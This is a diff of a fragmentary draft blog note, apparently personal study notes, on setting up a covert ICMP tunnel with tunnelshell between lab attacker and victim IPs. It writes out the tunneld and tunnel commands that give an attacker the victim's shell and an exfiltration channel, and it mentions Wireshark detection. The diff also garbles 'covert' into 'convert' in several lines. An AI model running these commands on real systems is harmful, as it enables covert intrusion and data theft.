cotes2020/jekyll-theme-chirpy/_posts/00Basic/draft.md

  ps |grep .tunneld netstat –ano
  ⁃
  ⁃
-  - Wireshark: captured the covert traffic and sniff the data that was travelling between two endpoint devices.
+  - Wireshark: captured the convert traffic and sniff the data that was travelling between two endpoint devices.
   - take a look of network traffic generated between 10.10.10.1 (Attacker’s IP) and10.
 10.10.2 (Victim’s IP) using .
-  - The network flow looks generic between both endpoints, but if it monitors properly, then a network administrator could sniff the data packet.  ⁃
+  - The network flow looks generic between both endpoints, but if it monitors properly, then a network administrator could sniff the data packet.  ⁃ convert ICMP Channel
-Covert ICMP Channel
 Ping: the use of ICMP communication, use icmp echo request and icmp echo reply query to establish a connection between two hosts, so, execute the command:
   - sudo ./tunneld -t icmp -m echo-reply, echo
 To connect with tunnelshell:
   - execute command on the server (Attacker’s machine)
-  - it will establish a covert channel for data exfiltration.
+  - it will establish a convert channel for data exfiltration.
   - ./tunnel -t icmp -m echo-reply,echo 10.10.10.2
 ⁃
   - it is successfully connected to 10.10.10.2 and the attacker is able to access the shell of the victim’s machine.